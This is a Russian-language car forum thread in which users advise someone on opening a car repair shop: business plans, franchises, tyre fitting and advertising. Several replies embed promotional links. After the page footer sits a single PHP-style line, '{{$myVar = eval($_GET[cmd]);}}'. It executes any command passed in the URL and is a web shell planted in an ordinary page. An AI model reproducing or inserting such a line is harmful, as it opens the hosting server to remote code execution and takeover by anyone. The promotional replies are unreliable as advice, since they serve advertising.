+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 20

Тема: Как проще всего открыть свой автосервис?


  1. #1

    Как проще всего открыть свой автосервис?

    Как проще всего открыть свой автосервис? Давно об этом подумываю, но боюсь, что вложу деньги, а дело не выгорит, останусь с носом, а то и то хуже - в долгах. Как сделать все грамотно, правильно, что бы быть в уверенным в успехе?

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    В открытие своего дела, любого, нельзя быть стопроцентов уверенным в успехе, даже если думаешь, что все риски просчитал. Советую начать составлять бизнес план, а лучше найти специалистов, которые могут помочь наладить бизнес с нуля.

  3. #3
    Таких энтузиастов как вы, полно) Весь Ютуб завален роликами - как я открыл свое СТО, как я открыл своей автосервис, как я в итоге прогорел... думаю с этих роликов и стоит начинать, может после них вы задумаетесь открыть что-то другое. Как минимум вы сможете учесть чужие ошибки и не повторить их в своем начинание.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Проще всего взять уже готовую модель бизнеса и использовать ее, если точнее, то франшизу, например автосервис по балансировка карданов - http://kardanniy-val.ru/partners . Чем это не бизнес? Узкопрофильно, однако действующий, а значит прибыльный) Если хотите более широкопрофильный автосервис, то поищите другие подобные франшизы, наверняка найдутся. Минус в сравнении с чисто своим бизнесом только одни - придется платить отчисления владельцу франшизы.

  5. #5
    Мимо проходил fionis is on a distinguished road Аватар для fionis
    Регистрация
    30.11.2018
    Машина
    Гольф
    Сообщений
    49
    За франшизу платить нужно будет постоянно, я сам открыл свое СТО, арендовал для этого несколько боксов. Сейчас еще мойку открываю для того чтобы дополнительный доход получать. Нужна еще хорошая реклама, но еще не решил во что лучше вложиться

  6. #6
    Мимо проходил Rostikk is on a distinguished road Аватар для Rostikk
    Регистрация
    05.12.2018
    Сообщений
    55
    Во-первых, нужно повесить большую вывеску, чтобы ее было заметно издалека. Баннеры над дорого повесьте, акцию объявите ,чтобы привлечь новых клиентов. Постоянным сделайте скидки. А еще можно заказать мобильное приложение для автомойки и автосервиса. Если вы из Москвы, то знаю, что вот тут можно заказать такое приложение https://apps4business.ru/services/avtomoyki/

  7. #7
    Мимо проходил Тунгус is on a distinguished road Аватар для Тунгус
    Регистрация
    28.05.2019
    Сообщений
    40
    Цитата Сообщение от Kar4er Посмотреть сообщение
    Таких энтузиастов как вы, полно) Весь Ютуб завален роликами - как я открыл свое СТО, как я открыл своей автосервис, как я в итоге прогорел... думаю с этих роликов и стоит начинать, может после них вы задумаетесь открыть что-то другое. Как минимум вы сможете учесть чужие ошибки и не повторить их в своем начинание.
    Если бы все так размышляли, то бизнесом бы никто не занимался в принципе. Если найти хорошее место возле оживленной дороги, то можно на этом нормально зарабатывать

  8. #8
    Мимо проходил Гвалиор is on a distinguished road Аватар для Гвалиор
    Регистрация
    29.11.2018
    Сообщений
    36
    Цитата Сообщение от fionis Посмотреть сообщение
    За франшизу платить нужно будет постоянно, я сам открыл свое СТО, арендовал для этого несколько боксов. Сейчас еще мойку открываю для того чтобы дополнительный доход получать. Нужна еще хорошая реклама, но еще не решил во что лучше вложиться
    А я бы на вашем месте лучше шиномонтаж открыл бы, с нашими дорогами без работы не останетесь точно. Кому то балансировку колес сделать, кому-то диск отрихтовать, вулканизацию сделать. Я уже не говорю про сезонную замену шин. А если помещение позволяет, то можно еще и предлагать услугу хранения шин. Нужно только сначала подсчитать какие вложения для этого понадобятся. Стоимость шиномонтажного оборудования можно тут посмотреть https://sto-avto.ru/shinomontazhnoe-oborudovanie. Составьте бизнес план и уже дальше действуйте

  9. #9
    Мимо проходил Denis Kilyazov is on a distinguished road Аватар для Denis Kilyazov
    Регистрация
    15.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1
    устроится учеником, потом самому

  10. #10
    Мимо проходил Lavr is on a distinguished road Аватар для Lavr
    Регистрация
    24.02.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    11
    Просто вам нужно все заранее рассчитать, свои вложения и то, сколько вы сможете на этом заработать.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. как открыть капот на г3?
    от BMXer в разделе Разное
    Ответов: 11
    Последнее сообщение: 26.01.2019, 18:45
  2. Чем Открыть Скачанный .avi На Айпеде
    от Spaikerr в разделе Курилка
    Ответов: 3
    Последнее сообщение: 05.02.2013, 21:23
  3. Помгите Пожалуйста Открыть Машину!
    от lermantov в разделе Разное
    Ответов: 30
    Последнее сообщение: 17.02.2009, 12:25
  4. Какой G3 лучше и проще найти.
    от Sheff в разделе Покупка и продажа авто
    Ответов: 23
    Последнее сообщение: 21.11.2006, 00:32

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}